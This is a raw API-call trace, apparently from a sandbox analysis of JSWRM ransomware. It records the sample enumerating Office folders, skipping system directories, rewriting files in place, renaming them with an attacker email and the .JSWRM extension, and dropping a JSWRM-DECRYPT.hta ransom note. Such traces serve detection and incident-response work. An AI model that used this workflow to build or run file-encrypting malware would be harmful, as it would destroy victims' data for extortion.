RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0116.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0116.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubcolor.scm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.659] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28672) returned 1 [0116.659] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7000) returned 0x24c1d0 [0116.660] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x7000, lpOverlapped=0x0) returned 1 [0116.663] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.663] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x7000, lpOverlapped=0x0) returned 1 [0116.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.664] CloseHandle (hObject=0x238) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0116.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.665] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubcolor.scm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBCOLOR.SCM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubcolor.scm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.666] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PUBFTSCM", cAlternateFileName="")) returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2=".") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="..") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="...") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="windows") returned -1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="recovery") returned -1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="perflogs") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="documents and settings") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="$RECYCLE.BIN") returned 1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="system volume information") returned -1 [0116.666] lstrcmpiW (lpString1="PUBFTSCM", lpString2="msocache") returned 1 [0116.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0116.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0116.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0116.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\jswrm-decrypt.hta")) returned 0xffffffff [0116.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0116.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0116.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0116.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0116.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0116.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.671] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.671] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0116.672] CloseHandle (hObject=0x238) returned 1 [0116.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0116.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\jswrm-decrypt.hta")) returned 0x20 [0116.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0116.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0116.673] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3c3411f5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232180 [0116.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0116.673] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3c3411f5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0116.673] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0116.674] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0116.674] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcda3b5c7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcda3b5c7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcdc2b493, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xcb7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="FONTSCHM.INI", cAlternateFileName="")) returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2=".") returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="..") returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="...") returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="windows") returned -1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="recovery") returned -1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="perflogs") returned -1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="documents and settings") returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="$RECYCLE.BIN") returned 1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="system volume information") returned -1 [0116.674] lstrcmpiW (lpString1="FONTSCHM.INI", lpString2="msocache") returned -1 [0116.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FONTSCHM.INI", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FONTSCHM.INI", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FONTSCHM.INI", lpUsedDefaultChar=0x0) returned 12 [0116.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0116.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FONTSCHM.INI", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FONTSCHM.INI", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FONTSCHM.INI", lpUsedDefaultChar=0x0) returned 12 [0116.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0116.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0116.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0116.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\FONTSCHM.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\fontschm.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.675] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3255) returned 1 [0116.675] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcb0) returned 0x24c1d0 [0116.675] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xcb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0xcb0, lpOverlapped=0x0) returned 1 [0116.676] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.677] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0xcb0, lpOverlapped=0x0) returned 1 [0116.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.677] CloseHandle (hObject=0x314) returned 1 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0116.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0116.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0116.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0116.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0116.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0116.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0116.677] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\FONTSCHM.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\fontschm.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\FONTSCHM.INI.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\fontschm.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0116.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0116.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0116.678] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3411f5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3c3411f5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3c3411f5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0116.678] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0116.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0116.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.679] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa49a612, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa49a612, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa49a612, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eea6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME01.CSS", cAlternateFileName="")) returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2=".") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="..") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="...") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="windows") returned -1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="recovery") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="perflogs") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="documents and settings") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="system volume information") returned -1 [0116.679] lstrcmpiW (lpString1="SCHEME01.CSS", lpString2="msocache") returned 1 [0116.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0116.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME01.CSS", cchWideChar=12, 